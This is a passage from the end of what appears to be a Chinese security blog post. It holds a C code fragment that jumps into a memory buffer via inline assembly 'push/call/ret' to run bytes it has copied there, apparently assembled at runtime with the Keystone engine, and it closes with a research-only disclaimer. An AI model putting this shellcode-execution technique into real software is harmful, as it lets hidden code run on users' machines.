// Pass the buffer address to fuckyou(), which pushes it and executes `ret`, so
// execution continues inside the copied bytes.
__asm{
push a
call fuckyou
}
//CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)a, NULL, NULL, NULL);
// NOTE: free encode after usage to avoid leaking memory
myks_free(encode);
// close Keystone instance when done
myks_close(ks);
getchar();
return 0;
}
效果于 2020/07/08
EDI安全
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。